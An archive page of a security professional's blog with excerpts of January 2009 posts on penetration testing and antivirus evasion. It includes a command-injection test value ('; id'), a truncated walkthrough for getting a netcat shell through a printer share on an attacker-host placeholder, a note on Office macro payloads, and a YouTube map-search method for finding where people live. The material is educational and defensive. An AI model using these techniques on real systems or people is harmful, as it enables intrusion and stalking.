Skip to main content


Showing posts from January, 2009

Welcome to Mark Baggett - In Depth Defense

I am the course Author of SANS SEC573 Automating Information Security with Python. Check back frequently for updated tools and articles related to course material.

Senior SANS Instructor
GSE #15
Internet Storm Center Handler
Penetration Testing and Incident Response Consultant
Technical Advisor to DoD for The SANS Institute
Founding President of the Greater Augusta ISSA
Cofounder of BSidesAugusta Security Conference

FREQ SERVER - Tool and technique for detecting Malware Command and Control domains
DOMAIN_STATES - Tool for detecting "Baby Domains" used for phishing and Malware distribution
SRUM_DUMP - Forensics tool for extracting System Resource Utilization Monitoring artifacts
LIAM_NEESON - Proof of Concept Linux Hash Protection
HONEY_HASHES - Certainly Honey Tokens have been around since 2003 but I created a cool technique for creating fake SATs in memory that was turned into Dell Secure Works DCEPT framework.
VSSOWN - Tool & Technique for Using Microsoft Volume Shadow Copies for hiding malware and extracting artifacts
SDB Hacking - Using Application Compatibility in unexpected ways.
SET-KBLED - Utility for Managing Clevo and Sager Laptop LED Backlit Keyboards - Scapy based fragement reassembly engine - A password cracker for the EAP protocol

and more. Most of these tools are available on my github page. Follow me on twitter @markbaggett

I know where you live... or at least google does

Can you use to find out where a video was uploaded? I’m not saying you can. I’m not saying you can’t. But I think it is interesting to try. Using the following method YouTube has led me to the homes of a few people I know. Does it work for you??

Start with YouTubes “Advanced Search”.

Click “Advanced Options” and “Show Map”. Type in the userid of the person your trying to location and click the SEARCH box inside the advanced search box (not the one at the top). If the video is in the circle it will be displayed in the result. If not you will see “No Videos found for xyz” and a playlist for the user you are searching for. The difference between a hit/no hit is subtle. Do a search for something you know is geoencoded so you can see the differenece. As a rule, if you see this then the video is not in the circle.

No videos found for “USERXYZ”
Playlist Results for USERXYZ

Zoom in one click at a time making your circle smal…

WebInspect and Arbitrary Command Execution

I won't be the first to say it, but its worth repeating; No scanner is a substitute for a human penetration test. That said, I find that WebInspect saves me a lot of time and often either finds vulnerabilities for me OR, just as often, generates error messages that lead me to finding issues pretty quickly.   I like to think of it as a web app fuzzer on steroids.  Here is a custom signature I've added to help me cover my bases.
When WebInspect scans for arbitrary command execution, it will only detect the flaw when the results of the command execution are returned to the browser. For example, it will inject "; id" into all the field on a page. If it doesn't see "uid=0(root) " (or preferrably the uid for an a less priveleged apache httpd user) returned from the web server somewhere in that response then it doesn't detect the vulnerability. But the web server very well may have executed code invisibly. Consider this example:
A website has a…

Today is a good day!

First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge.  When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs".    Thanks to Ed for putting together a fun challenge.  I always learn a lot any time I do anything related to Jedi Master Skoudo.
Challenge results

THEN I see this entry on Wesley's blog on pretending to be a printer with netcat.  It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back April 08.   Using that technique I was able to shovel command output to netcat running on an arbitrary port.  But I really want a bidirectional interactive shell.   The thought is this.   
1) Share a netcat listener on my linux box over SMB.    2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled 3) Net use lpt1 \\attackerip\netcatshare 4) lpt1 (The 16 bit p…

Infeasibility of Modeling Polymorphic Shellcode

This is a very interesting paper from some smart people at Columbia University. Here is my layman's summary for the terminally lazy:

Intro (paraphrase):
We are going to model the feasibility of modeling polymorphic shellcode to see if we can rely on antivirus heuristics and behavioral detection techniques.

Body (paraphrase):
Examine a ton of models & do some math that makes my head hurt.

"Our empirical results demonstrate the difficulty of modeling polymorphic behavior. We briefly summarized the achievements of the shellcoder community in making their code polymorphic and examined ways to improve some of these techniques. We presented analytical methods that can help assess the capabilities of polymorphic engines and applied them to some state-of-the-art engines. We explained why signature–based modeling works in some cases and confirmed that the viability of such approaches matches the intuitive belief that polymorphism will eventually defeat these methodologies.…

Door Schedule Fail

Huh?  I see this sign frequently.  So I went ahead and figured it out.  The diagram below reveals the door schedule.  I assigned a number to each of the times the door is closed, 1=9:30 pm - 4:00 am ; 2 = Monday - Friday; 3= 9:30 pm  etc..  So I guess they only unlock the stair wells on weekends when no one is in the office.  Must be a security measure.  :)
Sat, SunMonTues-ThursFridayHolidays00:00am-04:00am11,2,51,21,2,41,64:01-9:29pmOPEN2,52269:30pm1,31,2,3,51,2,31,2,31,3,69:31pm-11:59 pm11,2,51,21,21,6

Metasploit Visual Basic Payloads in action

John Strand turned me on to this at CDI in December. We were talking about my presentation on the effectiveness of antivirus in detecting metasploit payloads and he asked if I had done any testing on the visual basic payloads. At the time I had not, but now I have to agree with John's assersion that this is potentially a very scary and powerful feature. Metasploit payloads can easily be embedded in Microsoft Office Documents and, as you might expect if you've read my previous blogs, antivirus software does not detect the payloads. I made a video to demonstrate the creation and use of the payloads.

To mitigate these attacks you can use Group policy to set your Office Document Macro Security to HIGH. You could use the Medium setting if you work for that mythical company where users don't ignore security warnings. Here are some helpful links

Setting Macro Levels
Office Group Policy Templates

Or click here to check it out!

Who would you trust?

There is no shortage of stories about infected digital picture frames out there.  The SANS Internet Storm Center has had several posts on the subject.   When Santa brought my daughter a Sakar "Portable Digital Picture Frame"  I was sure to scan it with some antivirus software.   Sure enough, McAfee reports a Trojan exists in on the device.   I checked the Manufacturers  support page and found this note on the Product FAQ..
"Does my product have a virus?No. It has come to our attention that some versions of McAfee Antivirus are warning users about a potential virus in one of our files. We have confirmed that this is a false positive. There is no virus and users can install and use their frame without any fear of a virus infection. To avoid any installation issues, we suggest McAfee be temporarily suspended during installation and use. Users of Symantec and other antivirus products are not affected."
Other antivirus products are not affected.  It must just be a McAfee …